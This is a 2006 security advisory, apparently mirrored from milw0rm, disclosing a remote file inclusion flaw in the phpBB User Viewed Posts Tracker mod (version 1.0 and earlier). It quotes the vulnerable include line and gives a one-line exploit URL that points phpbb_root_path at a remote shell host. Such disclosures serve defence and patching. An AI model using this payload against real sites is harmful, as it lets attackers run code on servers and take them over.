Security Advisory: phpBB User Viewed Posts Tracker Version <= 1.0 [phpbb_root_path] File Include Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Cahier de textes 2.0   Remote SQL injection Exploit
  FreeForum 0.9.7 (fpath) Remote File Include Vulnerability
  Vulnerability in Btitracker
  phponline <= (LangFile) Remote File Inclusion Exploit

From: x0r0n_(at)_hotmail.com <x0r0n_(at)_hotmail.com>
Date: 07.10.2006
Subject: phpBB User Viewed Posts Tracker Version <= 1.0 [phpbb_root_path] File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

phpBB User Viewed Posts Tracker Version <= 1.0 [phpbb_root_path] File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Discovered by XORON(turkish hacker)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

URL: http://www.nivisec.com/downloads/phpbb/user_viewed_posts.zip

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Vuln. Code: include_once($phpbb_root_path . 'language/lang_' .
$board_config['default_lang'] . '/lang_user_viewed_posts.' . $phpEx);

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Exploit:
/includes/functions_user_viewed_posts.php?phpbb_root_path=http://SH3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=

# milw0rm.com [2006-10-06]

test server